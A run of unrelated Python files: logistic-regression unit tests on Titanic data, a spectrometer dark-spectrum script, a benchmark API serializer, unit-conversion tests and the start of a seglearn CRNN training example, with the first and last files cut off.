    result_required = list(map(lambda x: round(x, 2), result_required))
    result_actual = list(map(lambda x: round(x, 2), result_actual))
    assert (sorted(result_required) == sorted(result_actual))
    # Expected mean predicted probability.
    result_required = 0.4061624649859944
    result_actual = my_logistic_regresion_class.basic_result.predict(my_logistic_regresion_class.X).mean()
    result_required = round(result_required, 2)
    result_actual = round(result_actual, 2)
    assert (result_required == result_actual)
    # Expected cross-validation performance summary (exact string match).
    result_required = '''Performance (0 is negative 1 is positive)
5-Fold Cross Validation Results:
Test Set accuracy = 0.79
f1 = 0.73
precision = 0.76
recall = 0.7
auc = 0.85'''
    result_actual = my_logistic_regresion_class.log_reg_diagnostic_performance()
    assert (result_required == result_actual)
    # Expected interpretability probabilities.
    result_required = [0.4061624649859944, 0.24581360407372246, 0.795820946281563, 0.3999162261394402, 0.3539768140703711, 0.39737068898845873, 0.4064703482674913]
    result_actual = list(my_logistic_regresion_class.get_interpretation()['Probability'])
    result_required = list(map(lambda x: round(x, 2), result_required))
    result_actual = list(map(lambda x: round(x, 2), result_actual))
    assert (result_required == result_actual)
    # Expected comparative uplift predictions (order-insensitive, rounded).
    result_required = [0.22395117322839098, 0.3558311002657131, 0.3977261128754439, 0.4027792667251947,
                       0.4068054774641371, 0.8543626808843827]
    result_actual = sorted(list(my_logistic_regresion_class.feature_interpretability_comparative_df['Prediction_add1_or_with']))
    result_required = list(map(lambda x: round(x, 2), result_required))
    result_actual = list(map(lambda x: round(x, 2), result_actual))
    assert (result_required == result_actual)
    print('Success!')
def unit_test_2():
    """Fit via log_reg() and verify coefficients, mean prediction,
    cross-validated performance and interpretation probabilities."""
    print('Unit test 2...')
    import sys
    import os
    import warnings
    np.random.seed(101)
    warnings.filterwarnings("ignore")
    # project root is one level above the script's directory
    current_dir = '/'.join(sys.path[0].split('/')[:-1])
    titanic_csv = os.path.join(current_dir, 'Data', 'titanic', 'titanic.csv')
    df = pd.read_csv(titanic_csv)
    df['Sex'] = df['Sex'].map({'male': 0, 'female': 1})
    df = df[['Survived', 'Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare']].dropna()
    clf = LogisticRegressionClass(df, 'Survived', sig_level=0.05)
    clf.log_reg()

    # fitted coefficients (order-independent comparison)
    expected = [2.75415827153399, -1.2422486253277711, 2.6348448348873723,
                -0.043952595897772694, -0.375754870508454,
                -0.06193736644803373, 0.002160033540727779]
    actual = list(clf.basic_result.params)
    assert sorted(round(v, 2) for v in expected) == sorted(round(v, 2) for v in actual)

    # mean predicted probability over the training design matrix
    actual = clf.basic_result.predict(clf.X).mean()
    assert round(0.4061624649859944, 2) == round(actual, 2)

    # cross-validated performance report (exact text comparison)
    expected = '''Performance (0 is negative 1 is positive)
5-Fold Cross Validation Results:
Test Set accuracy = 0.79
f1 = 0.73
precision = 0.76
recall = 0.7
auc = 0.85'''
    assert expected == clf.log_reg_diagnostic_performance(clf.X, clf.y)

    # interpretation probabilities (element order matters here)
    expected = [0.4061624649859944, 0.24581360407372246, 0.795820946281563,
                0.3999162261394402, 0.3539768140703711,
                0.39737068898845873, 0.4064703482674913]
    actual = list(clf.get_interpretation()['Probability'])
    assert [round(v, 2) for v in expected] == [round(v, 2) for v in actual]
    print('Success!')
def unit_test_3():
    """Fit via log_reg() with the raw Sex column and verify coefficients,
    prediction mean, performance text, interpretability outputs and
    predictions from the original frame."""
    print('Unit test 3...')
    import sys
    import os
    import warnings
    np.random.seed(101)
    warnings.filterwarnings("ignore")
    current_dir = '/'.join(sys.path[0].split('/')[:-1])
    titanic_csv = os.path.join(current_dir, 'Data', 'titanic', 'titanic.csv')
    df = pd.read_csv(titanic_csv)
    df = df[['Survived', 'Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare']].dropna()
    clf = LogisticRegressionClass(df, 'Survived', sig_level=0.05)
    clf.log_reg()

    # fitted coefficients (order-independent comparison)
    expected = [5.389003106421364, -1.2422486253277716, -0.043952595897772714,
                -0.3757548705084541, -0.0619373664480337,
                0.002160033540727774, -2.6348448348873723]
    actual = list(clf.result.params)
    assert sorted(round(v, 2) for v in expected) == sorted(round(v, 2) for v in actual)

    # mean predicted probability over the training design matrix
    actual = clf.result.predict(clf.X).mean()
    assert round(0.4061624649859944, 2) == round(actual, 2)

    expected = '''Performance (0 is negative 1 is positive)
5-Fold Cross Validation Results:
Test Set accuracy = 0.79
f1 = 0.73
precision = 0.76
recall = 0.7
auc = 0.85'''
    assert expected == clf.log_reg_diagnostic_performance(clf.X, clf.y)

    # interpretation probabilities (element order matters here)
    expected = [0.40616246498599445, 0.24581360407372244, 0.23089275089703268,
                0.3999162261394402, 0.3539768140703711,
                0.39737068898845873, 0.4064703482674913]
    actual = list(clf.get_interpretation()['Probability'])
    assert [round(v, 2) for v in expected] == [round(v, 2) for v in actual]

    # comparative feature-interpretability column, compared in sorted order
    expected = [0.22395117322839098, 0.23089275089703268, 0.35583110026571313,
                0.3977261128754439, 0.4027792667251947, 0.4068054774641371]
    actual = sorted(clf.feature_interpretability_comparative_df['Prediction_add1_or_with'])
    assert [round(v, 2) for v in expected] == [round(v, 2) for v in actual]

    # nine largest predictions on the original frame
    expected = [0.98, 0.98, 0.98, 0.97, 0.97, 0.97, 0.97, 0.97, 0.97]
    actual = sorted(clf.predict_from_original(df))[:-10:-1]
    assert [round(v, 2) for v in expected] == [round(v, 2) for v in actual]
    print('Success!')
def unit_test_4():
    """log_reg_with_feature_selection(): coefficients, mean prediction,
    performance text, interpretation, report counts and original-frame
    predictions."""
    print('Unit test 4...')
    import sys
    import os
    import warnings
    np.random.seed(101)
    current_dir = '/'.join(sys.path[0].split('/')[:-1])
    titanic_csv = os.path.join(current_dir, 'Data', 'titanic', 'titanic.csv')
    df = pd.read_csv(titanic_csv)
    df = df[['Survived', 'Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare']].dropna()
    clf = LogisticRegressionClass(df, 'Survived', sig_level=0.05)
    clf.log_reg_with_feature_selection(verbose=False)

    expected = [2.98, 2.62, -1.32, -0.04, -0.38]
    actual = list(clf.result_with_feature_selection.params)
    assert sorted(round(v, 2) for v in expected) == sorted(round(v, 2) for v in actual)

    actual = clf.result_with_feature_selection.predict(clf.X_with_feature_selection).mean()
    assert round(0.4061624649859944, 2) == round(actual, 2)

    expected = '''Performance (0 is negative 1 is positive)
5-Fold Cross Validation Results:
Test Set accuracy = 0.8
f1 = 0.74
precision = 0.78
recall = 0.72
auc = 0.85'''
    assert expected == clf.log_reg_diagnostic_performance(clf.X_with_feature_selection,
                                                          clf.y_with_feature_selection)

    expected = [0.4061624649859944, 0.236473141666754, 0.7141621577909735,
                0.3998399415589254, 0.3537524130019424]
    actual = list(clf.get_interpretation()['Probability'])
    assert [round(v, 2) for v in expected] == [round(v, 2) for v in actual]

    # flattened counts from the classification report
    expected = [365, 59, 78, 212]
    actual = list(np.array(clf.logistic_regression_get_report(verbose=False)).flatten())
    assert [round(v, 2) for v in expected] == [round(v, 2) for v in actual]

    # nine largest predictions on the original frame
    expected = [0.98, 0.97, 0.97, 0.97, 0.97, 0.97, 0.97, 0.97, 0.97]
    actual = sorted(clf.predict_from_original(df))[:-10:-1]
    assert [round(v, 2) for v in expected] == [round(v, 2) for v in actual]
    print('Success!')
def unit_test_5():
    """log_reg() must cope with a missing value in the response column."""
    print('Unit test 5...')
    import sys
    import os
    import warnings
    np.random.seed(101)
    current_dir = '/'.join(sys.path[0].split('/')[:-1])
    titanic_csv = os.path.join(current_dir, 'Data', 'titanic', 'titanic.csv')
    df = pd.read_csv(titanic_csv)
    df = df[['Survived', 'Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare']]
    # poke a NaN into the response to exercise internal row handling
    df.loc[1, 'Survived'] = np.nan
    clf = LogisticRegressionClass(df, 'Survived', sig_level=0.05)
    clf.log_reg()
    expected = [5.38, -1.24, -0.04, -0.38, -0.06, 0.0, -2.63]
    actual = list(clf.result.params)
    assert sorted(round(v, 2) for v in expected) == sorted(round(v, 2) for v in actual)
    print('Success!')
def unit_test_6():
    """Feature selection with string-typed categorical columns and one
    column forced to stay in the model."""
    print('Unit test 6...')
    import sys
    import os
    import warnings
    np.random.seed(101)
    current_dir = '/'.join(sys.path[0].split('/')[:-1])
    titanic_csv = os.path.join(current_dir, 'Data', 'titanic', 'titanic.csv')
    df = pd.read_csv(titanic_csv)
    df = df[['Survived', 'Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare']]
    df.loc[1, 'Survived'] = np.nan
    # treat the ordinal columns as categorical strings
    for col in ('Pclass', 'Parch'):
        df[col] = df[col].astype('str')
    clf = LogisticRegressionClass(df, 'Survived', sig_level=0.05,
                                  cols_to_keep_static=['Pclass'])
    clf.log_reg_with_feature_selection(verbose=False)
    expected = [1.7, -1.41, -2.65, 2.62, -0.04, -0.38]
    actual = list(clf.result_with_feature_selection.params)
    assert sorted(round(v, 2) for v in expected) == sorted(round(v, 2) for v in actual)
    print('Success!')
def unit_test_7():
    """log_reg_one_at_a_time with feature selection: one coefficient per
    individually-tried column."""
    print('Unit test 7...')
    import sys
    import os
    import warnings
    np.random.seed(101)
    current_dir = '/'.join(sys.path[0].split('/')[:-1])
    titanic_csv = os.path.join(current_dir, 'Data', 'titanic', 'titanic.csv')
    df = pd.read_csv(titanic_csv)
    df = df[['Survived', 'Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare']]
    for col in ('Pclass', 'Parch'):
        df[col] = df[col].astype('str')
    clf = LogisticRegressionClass(df, 'Survived', sig_level=0.05,
                                  cols_to_keep_static=['Pclass'],
                                  cols_to_try_individually=['Parch', 'Sex', 'Age', 'Fare'],
                                  max_iter=1000)
    clf.log_reg_one_at_a_time(with_feature_selection=True)
    expected = [-0.73, 2.64, -0.04, 0.01]
    actual = list(clf.df_one_at_a_time['Coefficient'])
    assert sorted(round(v, 2) for v in expected) == sorted(round(v, 2) for v in actual)
    print('Success!')
def unit_test_8():
    """log_reg_one_at_a_time without feature selection."""
    print('Unit test 8...')
    import sys
    import os
    import warnings
    np.random.seed(101)
    current_dir = '/'.join(sys.path[0].split('/')[:-1])
    titanic_csv = os.path.join(current_dir, 'Data', 'titanic', 'titanic.csv')
    df = pd.read_csv(titanic_csv)
    df = df[['Survived', 'Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare']]
    for col in ('Pclass', 'Parch'):
        df[col] = df[col].astype('str')
    clf = LogisticRegressionClass(df, 'Survived', sig_level=0.05,
                                  cols_to_keep_static=['Pclass'],
                                  cols_to_try_individually=['Age', 'Fare'],
                                  max_iter=1000)
    clf.log_reg_one_at_a_time(with_feature_selection=False)
    expected = [-0.04, 0.01]
    actual = list(clf.df_one_at_a_time['Coefficient'])
    assert sorted(round(v, 2) for v in expected) == sorted(round(v, 2) for v in actual)
    print('Success!')
def unit_test_9():
    """log_reg_one_at_a_time with interpretability output enabled."""
    print('Unit test 9...')
    import sys
    import os
    import warnings
    np.random.seed(101)
    current_dir = '/'.join(sys.path[0].split('/')[:-1])
    titanic_csv = os.path.join(current_dir, 'Data', 'titanic', 'titanic.csv')
    df = pd.read_csv(titanic_csv)
    df = df[['Survived', 'Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare']]
    for col in ('Pclass', 'Parch'):
        df[col] = df[col].astype('str')
    clf = LogisticRegressionClass(df, 'Survived', sig_level=0.05,
                                  cols_to_keep_static=['Pclass'],
                                  cols_to_try_individually=['Age', 'Fare'],
                                  max_iter=1000)
    clf.log_reg_one_at_a_time(with_feature_selection=False, get_interpretability=True)
    expected = [0.4, 0.39]
    actual = list(clf.df_one_at_a_time['Controlled Probability'])
    assert sorted(round(v, 2) for v in expected) == sorted(round(v, 2) for v in actual)
    print('Success!')
def unit_test_10():
    """log_reg_one_at_a_time with both feature selection and
    interpretability enabled."""
    print('Unit test 10...')
    import sys
    import os
    import warnings
    np.random.seed(101)
    current_dir = '/'.join(sys.path[0].split('/')[:-1])
    titanic_csv = os.path.join(current_dir, 'Data', 'titanic', 'titanic.csv')
    df = pd.read_csv(titanic_csv)
    df = df[['Survived', 'Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare']]
    for col in ('Pclass', 'Parch'):
        df[col] = df[col].astype('str')
    clf = LogisticRegressionClass(df, 'Survived', sig_level=0.05,
                                  cols_to_keep_static=['Pclass'],
                                  cols_to_try_individually=['Age', 'Fare', 'Parch', 'Sex'],
                                  max_iter=1000)
    clf.log_reg_one_at_a_time(with_feature_selection=True, get_interpretability=True)
    expected = [0.4, 0.39, 0.35, 0.72]
    actual = list(clf.df_one_at_a_time['Controlled Probability'])
    assert sorted(round(v, 2) for v in expected) == sorted(round(v, 2) for v in actual)
    print('Success!')
def unit_test_11():
    """Feature selection bounded by a pseudo-R² ceiling (max_pr2)."""
    print('Unit test 11...')
    import sys
    import os
    import warnings
    np.random.seed(101)
    current_dir = '/'.join(sys.path[0].split('/')[:-1])
    titanic_csv = os.path.join(current_dir, 'Data', 'titanic', 'titanic.csv')
    df = pd.read_csv(titanic_csv)
    df = df[['Survived', 'Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare']]
    df.loc[1, 'Survived'] = np.nan
    for col in ('Pclass', 'Parch'):
        df[col] = df[col].astype('str')
    clf = LogisticRegressionClass(df, 'Survived', sig_level=0.05,
                                  cols_to_keep_static=['Pclass'])
    clf.log_reg_with_feature_selection(verbose=True, max_pr2=0.32)
    expected = [1.25, -1.31, -2.58, 2.52, -0.04]
    actual = list(clf.result_with_feature_selection.params)
    assert sorted(round(v, 2) for v in expected) == sorted(round(v, 2) for v in actual)
    print('Success!')
def unit_test_12():
    """Feature selection bounded by a maximum feature count (max_features)."""
    print('Unit test 12...')
    import sys
    import os
    import warnings
    np.random.seed(101)
    current_dir = '/'.join(sys.path[0].split('/')[:-1])
    titanic_csv = os.path.join(current_dir, 'Data', 'titanic', 'titanic.csv')
    df = pd.read_csv(titanic_csv)
    df = df[['Survived', 'Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare']]
    df.loc[1, 'Survived'] = np.nan
    for col in ('Pclass', 'Parch'):
        df[col] = df[col].astype('str')
    clf = LogisticRegressionClass(df, 'Survived', sig_level=0.05,
                                  cols_to_keep_static=['Pclass'])
    clf.log_reg_with_feature_selection(verbose=True, max_features=2)
    expected = [1.25, -1.31, -2.58, 2.52, -0.04]
    actual = list(clf.result_with_feature_selection.params)
    assert sorted(round(v, 2) for v in expected) == sorted(round(v, 2) for v in actual)
    print('Success!')
def unit_test_13():
    """Feature selection bounded by both max_features and max_pr2."""
    print('Unit test 13...')
    import sys
    import os
    import warnings
    np.random.seed(101)
    current_dir = '/'.join(sys.path[0].split('/')[:-1])
    titanic_csv = os.path.join(current_dir, 'Data', 'titanic', 'titanic.csv')
    df = pd.read_csv(titanic_csv)
    df = df[['Survived', 'Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare']]
    df.loc[1, 'Survived'] = np.nan
    for col in ('Pclass', 'Parch'):
        df[col] = df[col].astype('str')
    clf = LogisticRegressionClass(df, 'Survived', sig_level=0.05,
                                  cols_to_keep_static=['Pclass'])
    clf.log_reg_with_feature_selection(verbose=True, max_features=2, max_pr2=0.3)
    expected = [-0.24, -0.92, -1.97, 2.57]
    actual = list(clf.result_with_feature_selection.params)
    assert sorted(round(v, 2) for v in expected) == sorted(round(v, 2) for v in actual)
    print('Success!')
def unit_test_14():
    """A non-numeric response column must produce the documented error
    message instead of fitting."""
    print('Unit test 14...')
    import sys
    import os
    import warnings
    np.random.seed(101)
    current_dir = '/'.join(sys.path[0].split('/')[:-1])
    titanic_csv = os.path.join(current_dir, 'Data', 'titanic', 'titanic.csv')
    df = pd.read_csv(titanic_csv)
    df = df[['Survived', 'Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare']]
    # deliberately break the response dtype
    df['Survived'] = df['Survived'].astype('str')
    clf = LogisticRegressionClass(df, 'Survived', sig_level=0.05)
    clf.log_reg()
    expected = '\nThe response variable should be binary 0 and 1 and numeric type (i.e. int)'
    assert expected == clf.error_message
    print('Success!')
def unit_test_15():
    """A constant (all-zero) column must surface the solver's singular
    matrix failure via exception_message."""
    print('Unit test 15...')
    import sys
    import os
    import warnings
    np.random.seed(101)
    current_dir = '/'.join(sys.path[0].split('/')[:-1])
    titanic_csv = os.path.join(current_dir, 'Data', 'titanic', 'titanic.csv')
    df = pd.read_csv(titanic_csv)
    df = df[['Survived', 'Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare']]
    # a zero-variance column makes the design matrix singular
    df['AllZeros'] = 0
    df['Survived'] = df['Survived'].astype('int')
    clf = LogisticRegressionClass(df, 'Survived', sig_level=0.05, max_iter=5)
    clf.log_reg_with_feature_selection()
    assert 'Singular matrix' == str(clf.exception_message)
    print('Success!')
def unit_test_16():
    """log_reg() with explicit regularization strengths (C=0 and C=2)."""
    print('Unit test 16...')
    import sys
    import os
    import warnings
    np.random.seed(101)
    current_dir = '/'.join(sys.path[0].split('/')[:-1])
    titanic_csv = os.path.join(current_dir, 'Data', 'titanic', 'titanic.csv')
    df = pd.read_csv(titanic_csv)
    df = df[['Survived', 'Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare']]
    df['Survived'] = df['Survived'].astype('int')

    # regularization_C=0: expected values equal the unregularized fit
    clf = LogisticRegressionClass(df, 'Survived', sig_level=0.05, max_iter=500,
                                  regularization_C=0)
    clf.log_reg()
    expected = [5.389003106421364, -1.2422486253277716, -0.043952595897772714,
                -0.3757548705084541, -0.0619373664480337,
                0.002160033540727774, -2.6348448348873723]
    actual = list(clf.result.params)
    assert sorted(round(v, 2) for v in expected) == sorted(round(v, 2) for v in actual)

    # regularization_C=2: coefficients shrink toward zero
    clf = LogisticRegressionClass(df, 'Survived', sig_level=0.05, max_iter=500,
                                  regularization_C=2)
    clf.log_reg()
    expected = [4.405751074517862, -1.019718809617492, -0.035243106198760185,
                -0.3133464821793585, -0.03593459183804765,
                0.0036461299221873813, -2.4156954170686182]
    actual = list(clf.result.params)
    assert sorted(round(v, 2) for v in expected) == sorted(round(v, 2) for v in actual)

    expected = '''Performance (0 is negative 1 is positive)
5-Fold Cross Validation Results:
Test Set accuracy = 0.78
f1 = 0.72
precision = 0.76
recall = 0.69
auc = 0.85'''
    assert expected == clf.log_reg_diagnostic_performance()
    print('Success!')
if __name__ == '__main__':
    # run the whole suite in order
    for test in (unit_test_1, unit_test_2, unit_test_3, unit_test_4,
                 unit_test_5, unit_test_6, unit_test_7, unit_test_8,
                 unit_test_9, unit_test_10, unit_test_11, unit_test_12,
                 unit_test_13, unit_test_14, unit_test_15, unit_test_16):
        test()
# -*- coding: utf-8 -*-
# =============================================================================
# Created By : Maximilian Sender
# Copyright : Copyright 2021, Institute of Chemical Engineering, Prof. Dr. Dirk Ziegenbalg, Ulm University'
# License : GNU LGPL
# =============================================================================
"""The module Darkspec complements the module Radiometric_measurement and creates a dark spectrum for a measurement
with no switchable light source. Must be run in an ITOM environment.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
# =============================================================================
# Imports
# =============================================================================
import numpy as np
import queue
import time
import matplotlib.pyplot as plt
# Open the Avantes spectrometer plugin. If the first attempt fails the
# handle may still be held from a previous ITOM session; in that case drop
# the stale reference (when one exists) and retry once.
# Fix vs. original: the bare `except:` hid every error, and `del spec`
# raised NameError when `spec` had never been bound (e.g. on the very
# first failure in a fresh session).
try:
    spec = dataIO("AvantesAvaSpec", 6546, 1639)
except Exception:
    if 'spec' in globals():
        del spec
    spec = dataIO("AvantesAvaSpec", 6546, 1639)

# acquisition settings: integration time in seconds, number of averaged scans
int_time = 0.35
averages = 2
def dunkel():
    """Acquire one dark spectrum, crop it to the pixel window of interest
    and store it in the module-level ``dunkel_spec`` list.

    Fix vs. original: the ``global`` declaration appeared AFTER the first
    assignment to ``dunkel_spec``, which is a SyntaxError in Python 3
    ("name assigned to before global declaration"); it must come first.
    """
    global dunkel_spec
    spec.acquire()
    # wait for the acquisition: integration time times number of averages
    time.sleep(int_time * averages)
    lambda_table = spec.getParam("lambda_table")  # NOTE(review): unused; kept in case the read has device side effects — confirm
    data = dataObject([1, 2048], 'float32')
    spec.copyVal(data)
    dunkel_spec = list(data)
    # keep only pixels 203..1061 (859 values) of the 2048-pixel frame
    del dunkel_spec[1062:2048]
    del dunkel_spec[0:203]
    print("dunkel")
# --- main measurement sequence ---------------------------------------------
spec.startDevice()  # open the spectrometer connection
# configure acquisition: integration time (s), hardware dark correction off,
# number of scans averaged per acquisition
spec.setParam("integration_time", int_time)
spec.setParam("dark_correction", 0)
spec.setParam("average", averages)
print("wait")
# settle time before taking the dark spectrum
time.sleep(5)
dunkel()
# wrap the cropped 859-pixel dark spectrum in an ITOM dataObject
all_data = dataObject([1,859],'float32', data=dunkel_spec)
# all_data = dataObject([1,1062],'float32', data = dunkel_spec)
# plot(all_data, className = 'itom1dqwtplot')
plt.plot(all_data)
# output file name encodes integration time and averages, e.g. dark_0_35_av2.csv
savetext = str("TransferCurves/dark_"+str(int_time).replace('.', '_')+'_av'+str(averages)+'.csv')
np.savetxt(savetext, np.transpose(all_data), delimiter=';')
spec.stopDevice()
del spec
|
from texttable import Texttable
def args_print(args, logger):
    """Render all attributes of *args* as a two-column table and log it."""
    table = Texttable()
    table.add_row(["Parameter", "Value"])
    for name, value in vars(args).items():
        table.add_row([name, value])
    logger.info(table.draw())
|
# This file is part of the Reproducible Open Benchmarks for Data Analysis
# Platform (ROB).
#
# Copyright (C) 2019 NYU.
#
# ROB is free software; you can redistribute it and/or modify it under the
# terms of the MIT License; see LICENSE file for more details.
"""Interface to serialize benchmark resource objects."""
from benchengine.api.serialize.base import Serializer
import benchengine.api.serialize.hateoas as hateoas
import benchengine.api.serialize.labels as labels
class BenchmarkSerializer(Serializer):
    """Serializer for benchmark resource objects. Defines the methods that are
    used to serialize benchmark descriptors and handles.
    """
    def __init__(self, urls):
        """Initialize the reference to the Url factory.

        Parameters
        ----------
        urls: benchengine.api.route.UrlFactory
            Factory for resource urls
        """
        super(BenchmarkSerializer, self).__init__(urls)

    def benchmark_descriptor(self, benchmark):
        """Get dictionary serialization containing the descriptor of a
        benchmark resource.

        Parameters
        ----------
        benchmark: benchengine.benchmark.base.BenchmarkDescriptor
            Benchmark descriptor

        Returns
        -------
        dict
        """
        benchmark_id = benchmark.identifier
        leaderboard_url = self.urls.get_leaderboard(benchmark_id)
        obj = {
            labels.ID: benchmark_id,
            labels.NAME: benchmark.name,
            labels.LINKS: hateoas.serialize({
                hateoas.SELF: self.urls.get_benchmark(benchmark_id),
                hateoas.benchmark(hateoas.LEADERBOARD): leaderboard_url
            })
        }
        # Description and instructions are optional fields
        if benchmark.has_description():
            obj[labels.DESCRIPTION] = benchmark.description
        if benchmark.has_instructions():
            obj[labels.INSTRUCTIONS] = benchmark.instructions
        return obj

    def benchmark_handle(self, benchmark):
        """Get dictionary serialization containing the handle of a
        benchmark resource.

        Parameters
        ----------
        benchmark: benchengine.benchmark.base.BenchmarkHandle
            Handle for benchmark resource

        Returns
        -------
        dict
        """
        obj = self.benchmark_descriptor(benchmark)
        # Add parameter declarations to the serialized benchmark descriptor
        obj[labels.PARAMETERS] = [
            p.to_dict() for p in benchmark.template.parameters.values()
        ]
        return obj

    def benchmark_leaderboard(self, benchmark, leaderboard):
        """Get dictionary serialization for a benchmark leaderboard.

        Parameters
        ----------
        benchmark: benchengine.benchmark.base.BenchmarkHandle
            Handle for benchmark resource
        leaderboard: list(benchengine.benchmark.base.LeaderboardEntry)
            List of entries in the benchmark leaderboard

        Returns
        -------
        dict
        """
        runs = [
            {
                labels.USERNAME: run.user.username,
                labels.RESULTS: [
                    {labels.ID: key, labels.VALUE: run.results[key]}
                    for key in run.results
                ]
            }
            for run in leaderboard
        ]
        return {
            labels.SCHEMA: [{
                labels.ID: c.identifier,
                labels.NAME: c.name,
                labels.DATA_TYPE: c.data_type
            } for c in benchmark.template.schema.columns],
            labels.RUNS: runs
        }

    def benchmark_listing(self, benchmarks):
        """Get dictionary serialization of a benchmark listing.

        Parameters
        ----------
        benchmarks: list(benchengine.benchmark.base.BenchmarkDescriptor)
            List of benchmark descriptors

        Returns
        -------
        dict
        """
        return {
            labels.BENCHMARKS: [self.benchmark_descriptor(b) for b in benchmarks],
            labels.LINKS: hateoas.serialize({
                hateoas.SELF: self.urls.list_benchmarks()
            })
        }

    def benchmark_run(self, benchmark_id, run_id, state):
        """Get dictionary serialization for the current state of a benchmark
        run.

        Parameters
        ----------
        benchmark_id: string
            Unique benchmark identifier
        run_id: string
            Unique run identifier
        state: benchtmpl.workflow.state.WorkflowState
            Current run state

        Returns
        -------
        dict
        """
        obj = {
            labels.ID: run_id,
            labels.STATE: state.type_id
        }
        # If the workflow is not in pending mode it has a started_at timestamp
        if not state.is_pending():
            obj[labels.STARTED_AT] = state.started_at.isoformat()
        # If the workflow is not active it has a finished_at timestamp
        if not state.is_active():
            obj[labels.FINISHED_AT] = state.finished_at.isoformat()
        # If the workflow is in error state it has a list of error messages
        if state.is_error():
            obj[labels.MESSAGES] = state.messages
        return obj
|
import unittest
import quantities as pq
from semantic.units import ConversionService
class TestConversion(unittest.TestCase):
    """Unit tests for the natural-language unit ConversionService."""

    def compareConversion(self, inp, target):
        """Convert *inp* and assert it matches *target* in magnitude and units."""
        converted = ConversionService().convert(inp)
        self.assertEqual(converted.magnitude, target.magnitude)
        self.assertEqual(converted.units, target.units)

    def testSimple(self):
        expected = pq.Quantity(55.12, "kg")
        expected.units = "pounds"
        self.compareConversion("55.12 kilograms to pounds", expected)

    def testPer(self):
        expected = pq.Quantity(51.2, "kg / meter")
        expected.units = "pounds / ft"
        self.compareConversion(
            "fifty one point two kilograms per meter to pounds per foot",
            expected)

    def testReadability(self):
        phrase = "convert 0.000013 inches to centimeters"
        expected = pq.Quantity(0.000013, "inches")
        expected.units = "cm"
        # Correctness of conversion
        self.compareConversion(phrase, expected)
        # Correctness of representation
        self.assertEqual(ConversionService().parseUnits(phrase),
                         "3.3 times ten to the negative 5 cm")

    def testFloat(self):
        expected = pq.Quantity(11 + 2.0 / 3, "pounds")
        expected.units = "kg"
        self.compareConversion(
            "what is eleven and two thirds pounds converted to kilograms",
            expected)

    def testExtraction(self):
        extracted = ConversionService().extractUnits(
            "I want three pounds of eggs and two inches per squared foot")
        self.assertEqual(extracted, ['pounds', 'inches / foot^2'])

    def testExponentiation(self):
        service = ConversionService()
        # each phrasing of an exponent must parse to the same unit string
        for phrase, expected in (
                ("I want two squared meters", ['meters^2']),
                ("I want two square meters", ['meters^2']),
                ("I want two sq meters", ['meters^2']),
                ("I want two cubic meters", ['meters^3']),
                ("I want two meters cubed", ['meters^3']),
                ("I want two meters to the fifth power", ['meters^5']),
                ("I want two meters to the fifth", ['meters^5'])):
            self.assertEqual(service.extractUnits(phrase), expected)

    def testComplex(self):
        expected = pq.Quantity(7.5, "lb/ft**2")
        expected.units = "kg/m**2"
        self.compareConversion(
            "Seven and a half pounds per square ft to kg per meter squared",
            expected)
if __name__ == "__main__":
    loader = unittest.TestLoader()
    tests = loader.loadTestsFromTestCase(TestConversion)
    unittest.TextTestRunner(verbosity=2).run(tests)
|
"""
=======================================
Plotting Neural Network Training Curves
=======================================
This is a basic example using a convolutional recurrent neural network to learn segments directly from time series data
"""
# Author: David Burns
# License: BSD
import matplotlib.pyplot as plt
import numpy as np
from tensorflow.python.keras.layers import Dense, LSTM, Conv1D
from tensorflow.python.keras.models import Sequential
from tensorflow.python.keras.wrappers.scikit_learn import KerasClassifier
from pandas import DataFrame
from sklearn.model_selection import train_test_split
from seglearn.datasets import load_watch
from seglearn.pipe import Pype
from seglearn.transform import Segment
##############################################
# Simple NN Model
##############################################
def crnn_model(width=100, n_vars=6, n_classes=7, conv_kernel_size=5,
               conv_filters=3, lstm_units=3):
    """Build and compile a small convolutional-recurrent classifier.

    Parameters
    ----------
    width : int
        number of time steps per segment
    n_vars : int
        number of variables (channels) per time step
    n_classes : int
        number of output classes
    conv_kernel_size : int
        length of the 1D convolution kernel
    conv_filters : int
        number of convolution filters
    lstm_units : int
        number of LSTM units

    Returns
    -------
    A compiled keras ``Sequential`` model.
    """
    net = Sequential()
    # Convolution over the time axis of each (width, n_vars) segment.
    net.add(Conv1D(filters=conv_filters, kernel_size=conv_kernel_size,
                   padding='valid', activation='relu',
                   input_shape=(width, n_vars)))
    # Recurrent layer summarizes the convolved sequence into one vector.
    net.add(LSTM(units=lstm_units, dropout=0.1, recurrent_dropout=0.1))
    net.add(Dense(n_classes, activation="softmax"))
    net.compile(loss='categorical_crossentropy', optimizer='adam',
                metrics=['accuracy'])
    return net
##############################################
# Setup
##############################################
# load the data
data = load_watch()
X = data['X']
y = data['y']
# split the data
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=42)
# create a segment learning pipeline
# Segment slices each series into fixed-width windows; the classifier is
# rebuilt from crnn_model for each fit.
pipe = Pype([('seg', Segment(width=100, step=100, order='C')),
             ('crnn', KerasClassifier(build_fn=crnn_model, epochs=4, batch_size=256,
                                      verbose=0, validation_split=0.2))])
##############################################
# Accessing training history
##############################################
# this is a bit of a hack, because history object is returned by the
# keras wrapper when fit is called
# this approach won't work with a more complex estimator pipeline, in which case
# a callable class with the desired properties should be made passed to build_fn
